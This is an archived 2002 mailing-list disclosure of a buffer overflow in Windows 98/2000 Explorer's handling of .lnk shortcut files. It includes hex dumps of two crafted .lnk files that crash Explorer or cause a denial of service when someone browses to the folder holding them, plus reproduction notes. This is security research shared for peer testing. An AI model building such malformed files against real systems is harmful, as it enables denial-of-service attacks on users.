Windows .lnk Files

From: Brett Moore (brettat_private)
Date: Tue Jun 25 2002 - 16:40:48 PDT


    It seems that the handling of .lnk files has a few problems. I have tested
    on both win98 and win2000 sp2 server.

    Can anyone test further? Note that the actions taken by these .lnk files have
    the possibility of causing damage to a system and should not be tested on an
    essential server :-)
    
    -------------------------------------------------------------------
    32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
    FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    -------------------------------------------------------------------
    
    This causes FF FF to be loaded into a register used to control the length of
    data copied. It usually causes an error when right-clicking on the file in
    Explorer; sometimes it is required to select Properties. Errors seen include
    unable to read, unable to write. Since we are controlling the length of the
    data copied, these errors are self-explanatory.
    
    It would seem that explorer/shell32.dll is copying too much data when reading
    the filename? OK, so this causes the read/write errors and halts progress.
    
    But if we substitute valid values such as 01 01 (CC CC), then the buffer
    still gets overflowed, but we bypass this error and our corrupt values get
    further down in the program.
    
    -------------------------------------------------------------------
    32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
    CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
    AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    -------------------------------------------------------------------
    
    This one does not cause the read/write errors but causes a DoS in explorer
    just by browsing to the folder holding the file.
    
    This is more interesting, but involves tracking a lot of assembler code. The
    worst result would be some sort of code executed just by browsing a folder.
    Virus-related, perhaps.
    
    Any feedback on results or further research into this problem would be
    appreciated.
    
    Notes:
        Do not save to your desktop.
        Rename the file to .lnk.
        This is the win98 file. You can easily modify a 2000 or other .lnk file
        as detailed above.
    
    
    Brett Moore
    This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 09:52:52 PDT